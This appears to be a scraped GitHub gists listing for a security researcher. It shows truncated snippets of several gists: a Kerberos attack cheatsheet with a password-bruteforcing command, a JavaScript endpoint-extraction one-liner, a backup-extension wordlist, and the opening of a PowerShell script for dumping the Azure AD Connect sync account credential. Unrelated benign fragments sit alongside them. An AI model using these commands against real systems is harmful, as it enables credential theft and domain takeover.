Sachin Kamath pwnfoo

Keybase proof

I hereby claim:

  • I am pwnfoo on github.
  • I am pwn_foo (https://keybase.io/pwn_foo) on keybase.
  • I have a public key ASCXi5BiiGlfwZ4alOo0TmdeM8TVAm2ypKd4kOogbmJA6go

To claim this, I am signing this object:

@pwnfoo
pwnfoo / kerberos_attacks_cheatsheet.md
Created August 17, 2020 06:11 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform Kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@pwnfoo
pwnfoo / ejs.sh
Created April 19, 2020 17:55 — forked from gwen001/ejs.sh
One-liner to extract endpoints from JS files of a given host
curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu
# debug mode and absolute/relative urls support (the best one):
function ejs() {
URL=$1;
curl -Lks $URL | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"'##### %\";curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"('#####.*)|(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\" | sort -fu" | tr -d
@pwnfoo
pwnfoo / extensions_temp_backup.txt
Created April 12, 2020 17:17 — forked from hackerscrolls/extensions_temp_backup.txt
Common temp and backup extensions for files and directories by twitter.com/hackerscrolls
.0
.1
.2
.3
.tar
.tgz
.zip
.tar.gz
.rar
.cache
@pwnfoo
pwnfoo / azuread_decrypt_msol_v2.ps1
Created April 11, 2020 12:58 — forked from xpn/azuread_decrypt_msol_v2.ps1
Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync
Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
Write-Host "`t[ Updated to support new cryptokey storage method ]`n"
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"
try {
$client.Open()
} catch {
Write-Host "[!] Could not connect to localdb..."
return

Google Summer of Code 2017

Fedora Project - Welcome Kit

Inspired by the Welcome kit created by Remy DeCauseMaker (decause) which can be found here. Contains content from the original post.

Welcome

------------------
Average Number of Problems Solved per Team (eligible, scoring): 4.036 +/- 3.824
Median Number of Problems Solved per Team (eligible, scoring): 3.000
------------------
Average Number of Problems Solved per User (eligible, user scoring): 3.318 +/- 3.084
Median Number of Problems Solved per User (eligible, user scoring): 2.000
------------------
Team participation averages:
Team size: 0 0.000 submitted a correct answer 0.000 submitted some answer
Team size: 1 0.670 submitted a correct answer 0.617 submitted some answer

Signs up a user and returns initial details, including the Anokha ID.

Make sure you save the Anokha ID as you might be needing it later.

  • Type: POST
  • Authorization Required : NO
  • Authorization Level : -NA-
  • Arguments required:
    • firstName - (1-50 characters long)
    • lastName - (1-50 characters long)
    • gender - enum('Male', 'Female')
@pwnfoo
pwnfoo / college_list_master.txt
Created January 20, 2017 06:06
Comprehensive list of colleges in India.
collegeList = ["A. D. Patel Institute of Technology",
"A.K.G. Engineering College",
"A.R.J. College of Engineering and Technology",
"ABES Engineering College",
"ACE Engineering College",
"AES American Embassy School",
"AIMIT",
"AIT",
"AMC Engineering College",
"APS College of Engineering",